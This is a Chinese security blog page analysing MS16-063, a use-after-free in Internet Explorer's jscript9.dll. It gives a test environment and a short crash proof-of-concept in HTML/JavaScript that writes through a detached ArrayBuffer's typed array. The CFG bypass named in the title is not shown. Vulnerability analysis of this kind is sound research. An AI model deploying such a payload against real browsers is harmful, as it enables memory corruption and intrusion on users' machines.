文章详情
MS16-063绕过CFG利用
日期:2020/11/2 10:41:13
简介
MS-16-063是Internet explorer jscript9.dll中的一个UAF漏洞;
测试环境
win7 sp1 32
ie 11.0.9600.18204
Crash 分析
POC来源theori
<html>
<body>
<script>
function pwn() {
var ab = new ArrayBuffer(1000 * 1024);
var ia = new Int8Array(ab);
detach(ab);
setTimeout(main, 50, ia);
function detach(ab) {
postMessage("", "*", [ab]);
}
function main(ia) {
ia[100] = 0x41414141;
}
}
pwn()
</script>
</body>
</html>
上一文章:D盾dll劫持利用
下一文章:从JS敏感信息泄露到GETSHELL
相关推荐
- 10-21ApacheSolrReplicationHandler漏洞浅析(CVE
- 10-23burpsuite插件编写入门【暴躁脾气】
- 05-08分析和学习WordPress
- 11-11LinuxkernelBPF模块的相关漏洞分析
- 05-26.net反序列化之XmlSerializer
- 11-06一次艰难的TP渗透测试
- 11-09xxl-jobapi未授权Hessian2反序列化
- 11-13华为路由器漏洞CVE-2017-17215复现分析
- 11-17从0到tfp0第一部分:基础知识
- 10-21Spring反射性文件下载漏洞(CVE-2020-5421)分
- 05-11sql注入攻击的原理(sql注入攻击防范)
- 05-26黑客是如何入侵的?常见的黑客手段 黑客攻击
- 11-03记一次不存在的ecshop实战渗透
- 10-21fastadmin后台注入分析